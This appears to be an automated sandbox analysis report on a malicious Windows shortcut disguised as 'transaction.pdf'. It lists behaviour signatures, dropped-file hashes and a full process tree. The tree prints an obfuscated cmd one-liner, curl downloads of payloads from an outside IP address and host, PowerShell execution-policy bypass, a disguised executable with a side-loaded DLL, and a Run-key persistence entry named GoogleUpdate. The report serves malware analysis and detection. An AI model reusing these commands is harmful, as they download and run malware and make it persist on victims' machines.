Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/11/2024, 22:06

General

  • Target

    transaction.pdf.lnk

  • Size

    3KB

  • MD5

    0a2f22c7a16adfe8fbfa67b77edc82b4

  • SHA1

    c2556809eee64ec4061a50d4ea2ee41d6781371f

  • SHA256

    d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

  • SHA512

    002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\System32\cscript.exe
        cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4616
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\System32\curl.exe
            curl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg
            5⤵
              PID:5096
            • C:\Windows\System32\curl.exe
              curl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa
              5⤵
                PID:1748
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2192
              • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
                C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4088
                • C:\Windows\System32\wscript.exe
                  wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"
                  6⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:2772
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4264
                    • C:\Windows\System32\wscript.exe
                      wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                      8⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3248
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4932
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4816
                          • C:\Windows\system32\cscript.exe
                            "C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK
                            11⤵
                            • Blocklisted process makes network request
                            PID:2376
                    • C:\Windows\System32\wscript.exe
                      wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                      8⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3616
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                        9⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2328
                        • C:\Windows\System32\reg.exe
                          reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f
                          10⤵
                          • Adds Run key to start application
                          PID:4500

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              fe3aab3ae544a134b68e881b82b70169

              SHA1

              926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

              SHA256

              bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

              SHA512

              3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              c0e79e67a9a209d37c9e3a9dd6437ab0

              SHA1

              ce94d8bb54f007e7536727606f8120688da83cd4

              SHA256

              7f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0

              SHA512

              0fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d

            • C:\Users\Admin\AppData\Local\Microsoft\hello.js

              Filesize

              7KB

              MD5

              d3764fea6416c62582aae6f79759c2be

              SHA1

              ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7

              SHA256

              0528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0

              SHA512

              0da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac

            • C:\Users\Admin\AppData\Local\Microsoft\text1

              Filesize

              1KB

              MD5

              2c4ffae6bfebb1ee0035e1400034265d

              SHA1

              1f93c5cb3953f4a5927ab97eb1618f2c08c448a1

              SHA256

              2fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3

              SHA512

              860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae

            • C:\Users\Admin\AppData\Local\Microsoft\text2

              Filesize

              1KB

              MD5

              fc8b6f161d4f96d3d299400aa78914b7

              SHA1

              dbe374b617e289f945608254583fc405489f68a5

              SHA256

              bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f

              SHA512

              00b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c

            • C:\Users\Admin\AppData\Local\Microsoft\text3

              Filesize

              1KB

              MD5

              4c5b654dd985cb1757a4aa84545dc994

              SHA1

              0266eecac74bbb118780201100bcb8ec8aceef3c

              SHA256

              7639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99

              SHA512

              93615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0

            • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

              Filesize

              78KB

              MD5

              db2fefe19f85e618f62686cf453df33c

              SHA1

              9a37897fb3e75074d451c87e5b3dd602545648a6

              SHA256

              67077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463

              SHA512

              e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2f4cjrn.dvj.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\base.zip

              Filesize

              634KB

              MD5

              367a5951e81795113b8564546a8346c5

              SHA1

              f5dede6905ce2f0ca23a8f29052c6cbfc66da404

              SHA256

              4cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77

              SHA512

              061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488

            • C:\Users\Admin\AppData\Local\Temp\bat2.bat

              Filesize

              448B

              MD5

              aa350b1db128975bd16e8c2c7c4df7f1

              SHA1

              7be6d97138179f8676740a4e0cbb660736183397

              SHA256

              69d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017

              SHA512

              65e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6

            • C:\Users\Admin\AppData\Local\Temp\dxgi.dll

              Filesize

              2.4MB

              MD5

              83ce934c9273a1daf846ccd0186e1497

              SHA1

              4439cd1642e8af4f4b6f709bd69ea6afabb62d80

              SHA256

              bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819

              SHA512

              c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f

            • C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

              Filesize

              129B

              MD5

              88c7a65cabaeae2e10cbc7bd5608b28b

              SHA1

              d6ee96710a99d0f65a867c6082148ae7a4981227

              SHA256

              250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543

              SHA512

              b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

            • C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1

              Filesize

              6KB

              MD5

              f230b7afc89267a9766f3406cb5dbddf

              SHA1

              06797eb37d26eb18757db1daff2d381ab25566ab

              SHA256

              aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4

              SHA512

              c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a

            • C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs

              Filesize

              604B

              MD5

              66837cd467d2e7fb879f7f8a8a7c32c9

              SHA1

              70367364b2a4ccf95dc39edb3df96cb0bddbce5b

              SHA256

              7904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5

              SHA512

              8ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a

            • memory/2192-20-0x00000260256C0000-0x00000260256CA000-memory.dmp

              Filesize

              40KB

            • memory/2192-19-0x0000026027C10000-0x0000026027C22000-memory.dmp

              Filesize

              72KB

            • memory/2192-9-0x000002600D140000-0x000002600D162000-memory.dmp

              Filesize

              136KB

            • memory/4088-57-0x00007FFCD3B50000-0x00007FFCD3C8D000-memory.dmp

              Filesize

              1.2MB